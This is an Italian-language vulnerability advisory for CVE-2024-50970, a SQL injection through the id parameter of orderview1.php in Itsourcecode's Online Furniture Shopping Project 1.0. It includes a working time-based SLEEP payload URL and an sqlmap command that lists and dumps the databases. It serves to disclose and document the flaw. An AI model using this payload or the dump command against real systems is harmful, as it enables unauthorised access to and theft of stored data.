CVE-2024-50970
Descrizione
Una vulnerabilità di SQL injection in orderview1.php di Itsourcecode Online Furniture Shopping Project 1.0 consente a un utente malintenzionato remoto di eseguire comandi SQL arbitrari tramite il parametro id.
Tipo di vulnerabilità
SQL Injection
Fornitore del prodotto
Itsourcecode
Base del codice prodotto affetto:
https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/ - 1.0
Componente affetto:
Itsourcecode Online Furniture Shopping v1.0 è vulnerabile a SQL injection attraverso il parametro id nella pagina orderview1.php
Vettori d'attacco:
- Configurare l'applicazione localmente, registrare un account e accedere con l'account appena registrato.
- Navigare al seguente URL nel browser:
http://localhost/nikos/orderview1.php?action=edit&id=1728835149
- Iniettare il payload SQL:
Modificare il parametro id nell'URL per includere un payload di SQL injection basato sul tempo.
http://localhost/nikos/orderview1.php?action=edit&id=1728835149+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))DTmU)
- Osservare la risposta dell'applicazione:
La pagina dovrebbe impiegare notevolmente più tempo (10 secondi) per caricarsi se l'iniezione ha successo, confermando che il parametro id è vulnerabile a SQL injection.
- Utilizzare ora lo strumento SQLMap per ulteriori sfruttamenti e dumping dei database usando il comando seguente:
python sqlmap.py -u "http://localhost/nikos/orderview1.php?action=edit&id=1728835149" --cookie="PHPSESSID=your_cookie_here"--risk 3 --level 3 --dbs --technique=T --dump --no-cast
Riferimenti:
- https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/
- https://owasp.org/www-community/attacks/SQL_Injection